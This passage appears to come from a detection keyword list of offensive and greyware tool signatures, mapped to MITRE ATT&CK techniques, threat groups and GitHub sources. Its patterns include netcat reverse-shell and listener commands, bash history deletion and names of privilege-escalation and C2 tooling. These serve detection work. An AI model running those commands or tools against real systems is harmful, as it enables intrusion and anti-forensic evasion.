Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-Jenkins.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*rhosts_walker_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*RiccardoAncarani/BOFs*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z"
+"*RiccardoAncarani/LiquidSnake*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z"
+"*RiccardoAncarani/TaskShell*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","1","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z"
+"*rid_hijack.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"*ridbrute_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*ridrelay*","offensive_tool_keyword","ridrelay","Quick and easy way to get domain usernames while on an internal network.","T1175 - T1553.002 - T1553.003","TA0003 - TA0008 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/skorov/ridrelay","1","0","N/A","N/A","4","375","62","2020-05-20T03:35:32Z","2018-04-14T22:10:01Z"
+"*Ripemd-160.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*rkervella/CarbonMonoxide*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z"
+"*rlwrap -cAr nc -lvnp *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"*rlwrap nc -lvnp *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*rm .bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*rm /home/*/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*rm /root/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*rm -f *.o dump_vdso test_payload*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z"
+"*rm -f backpipe* mknod /tmp/backpipe p && nc *","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z"
+"*rmg 
bind * jmxrmi --bind-objid *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg bind *127.0.0.1:*--localhost-bypass*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg call * --plugin GenericPrint.jar*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg call * --signature * --bound-name plain-server*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg codebase *http* --component 
*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg codebase *java.util.HashMap *--bound-name legacy-service*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg enum *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg guess * *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg known javax.management.remote.rmi.RMIServerImpl_Stub*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java 
RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg listen * CommonsCollections*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg listen 0.0.0.0 *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg objid *[*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg roguejmx *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - 
TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg scan *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg scan * --ports *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg serial * AnTrinh * --component *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*rmg serial *CommonsCollections*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg-*-jar-with-dependencies.jar*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg*--yso*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*RMIRegistryExploit.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*rmmod -r*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*rmmod --remove*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*roadrecon plugin *","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roadrecon*gather.py*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roadrecon.db*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roadrecon/frontend*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*ROADtools.git*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools 
for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*ROADtools-master*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roastinthemiddle -i * -t * -u *.txt -g *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*robertdavidgraham/masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","1","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*RobustPentestMacro*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*ROCAVulnerabilityTester*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A",,"N/A",,, +"*rockyou.txt.gz*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*rockyou.txt.gz*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*rockyou-30000.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
+"*RogueOxidResolver.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.exe*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.sln*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.zip*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato-master*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege 
